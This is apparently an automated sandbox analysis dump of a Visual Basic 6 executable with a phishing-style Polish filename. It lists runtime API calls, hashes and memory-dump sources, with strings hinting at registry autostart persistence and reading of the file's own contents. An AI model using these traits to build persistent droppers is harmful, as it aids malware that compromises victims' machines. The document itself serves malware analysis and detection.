                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040F89E
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0040F8E5
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,Function_000032B6), ref: 00429F6E
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429F9B
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FA7
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00429FB6
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429FCF
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 00429FDF
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 00429FED
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FF6
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,00403208,00000004,?,?,?,00000000,Function_000032B6), ref: 0042A015
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 0042A025
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0042A033
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A03C
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0042A052
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(0042A07C,?,?,?,00000000,Function_000032B6), ref: 0042A06C
                                                                                                                                                                                                                                                        • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A075
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( RO,00000000,80000002,00000000,Start,00000004,80000002,00000000,Start,00000002,80000001,00000000,00000000,00000000), ref: 0040F95B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0040F966
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0040F980
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0040F98B
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,00000000,Function_000032B6), ref: 0040F9A6
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( RO,00000000,?,00000000,Function_000032B6), ref: 0040F9C2
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 0040F9CD
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,00000000,Function_000032B6), ref: 0040F9E6
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 0040F9F1
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,00000000,Function_000032B6), ref: 0040FA0C
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #648.MSVBVM60(0000000A), ref: 00422959
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFreeVar.MSVBVM60 ref: 00422968
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60(?), ref: 0042297C
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 0042299A
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #570.MSVBVM60(00000000), ref: 004229A1
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #525.MSVBVM60(00000000), ref: 004229EC
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 004229F7
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A07
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A22
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422A4A
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60 ref: 00422A68
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #616.MSVBVM60(00000000), ref: 00422A80
                                                                                                                                                                                                                                                      • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0F4,00000000,0042C0D4), ref: 0040FA7B
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( MR,00000000,0042C110,0042C114,0042C118,00000000,0042C0D4), ref: 0040FAA3
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040FAAE
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00000000), ref: 0040FABD
                                                                                                                                                                                                                                                      • __vbaCastObj.MSVBVM60(00000000,004077C4), ref: 0040FAD1
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040FADC
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000730), ref: 0040FB0F
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0040FB2A
                                                                                                                                                                                                                                                      • __vbaNew.MSVBVM60(004075DC), ref: 0040FB3C
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040FB47
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000730), ref: 0040FB7A
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0040FB95
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040FBC0
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040FBDA
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0040FBE1
                                                                                                                                                                                                                                                      • #529.MSVBVM60(00000008), ref: 0040FBF5
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(6D076537,00000000,00000000), ref: 00425A0A
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Free$Move$Copy$Error$ChkstkSystem$AnsiBstrUnicode$List$File$#525#529#570#580#648CheckHresultOpen$#616CastGet3Get4Seek
                                                                                                                                                                                                                                                      • String ID: $ MR$ RO$O$Once$Start$at
                                                                                                                                                                                                                                                      • API String ID: 3212910503-2307593978
                                                                                                                                                                                                                                                      • Opcode ID: d7c645850be29222d1b7267b5b78ad533bfe0a9cf40cb1f2a83c7e80c5fd35d6
                                                                                                                                                                                                                                                      • Instruction ID: 65a71e158419679981a83cfad656d767fba14ec0aa04879cc95e73d8581266b7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7c645850be29222d1b7267b5b78ad533bfe0a9cf40cb1f2a83c7e80c5fd35d6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F020D75A00208EFDB14DFA0DE89BDE77B4FB48304F508169E505B72A1DB74AA45CF68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CB91,00000000), ref: 0042984E
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042987B
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042988A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,?,?,?,00000000,004032B6), ref: 004298A3
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 004298AE
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,?,?,?,?,?,00000000,004032B6), ref: 004298C7
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 004298D2
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,00000000,000F003F,?,?,?,?,?,?,00000000,004032B6), ref: 004298F2
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,?,?,00000000,004032B6), ref: 00429906
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,00000000,004032B6), ref: 00429914
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0042992C
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00429962
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(80000002,00000000), ref: 00429973
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00429981
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0042998A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 004299B3
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(?), ref: 004299CA
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 004299D9
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000000,00000001,00000000), ref: 004299EA
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 004299F5
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00429A05
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00429A13
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00429A2F
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429A47
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,?,00000000,004032B6), ref: 00429A58
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429A66
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429A6F
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429A84
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(80000001,00000000,?,?,?,?,00000000,004032B6), ref: 00429A95
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429AA3
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429AAC
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0042999F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00429ADB
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(80000002,00000000), ref: 00429AEC
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00429AFA
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00429B03
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 00429B18
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00429B2C
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(?), ref: 00429B43
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 00429B52
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000000,00000001,00000000), ref: 00429B63
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00429B6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00429B7E
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00429B8C
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00429BA8
                                                                                                                                                                                                                                                      • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429BC0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,?,00000000,004032B6), ref: 00429BD1
                                                                                                                                                                                                                                                      • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429BDF
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429BE8
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429C3B
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00429C84,?,?,?,?,00000000,004032B6), ref: 00429C6B
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429C74
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429C7D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Free$AnsiError$System$MoveUnicode$BstrCopy$#516#631List$Chkstk
                                                                                                                                                                                                                                                      • String ID: MGG$MGG$X1@
                                                                                                                                                                                                                                                      • API String ID: 3619963569-3990769864
                                                                                                                                                                                                                                                      • Opcode ID: 940beab17d9b24f9990cadcffc4ef0ae816e00d13d285cc8866c0fad8e1e78f3
                                                                                                                                                                                                                                                      • Instruction ID: cadc88f3378a5b8a7e488d7ed3a86a3d9527093b9cfaa094389870ae1251132b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 940beab17d9b24f9990cadcffc4ef0ae816e00d13d285cc8866c0fad8e1e78f3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93D1ABB1900109EFDB04EFE0EE99EDEBB79EF48305F108169F602B6160DB756945CB64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,00000000), ref: 0042153E
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00421546
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001,?,00000000), ref: 0042154A
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A,?,00000000), ref: 00421562
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60(?,00000000), ref: 00421571
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,?,00000000), ref: 00421583
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000020,000000FF,00000000,?,00000000), ref: 0042158A
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421592
                                                                                                                                                                                                                                                      • #570.MSVBVM60(00000000,?,00000000), ref: 00421595
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(Function_0000545C,?,00000000), ref: 004215A2
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(Function_0000545C,?,00000000), ref: 004215C7
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00000000,?,00000000), ref: 004215CE
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 004215D9
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,00000000), ref: 004215E1
                                                                                                                                                                                                                                                      • __vbaFileSeek.MSVBVM60(00000000,00000000,?,00000000), ref: 004215E5
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,00000000), ref: 004215ED
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 004215F6
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000,?,00000000), ref: 0042162F
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00000000,?,00000000), ref: 00421632
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000000), ref: 0042164F
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,00000000), ref: 004217B1
                                                                                                                                                                                                                                                      • __vbaFileClose.MSVBVM60(00000000,?,00000000), ref: 004217BA
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?,00000000), ref: 004217BE
                                                                                                                                                                                                                                                      • __vbaPut3.MSVBVM60(00000004,?,00000000,?,00000000), ref: 004217C7
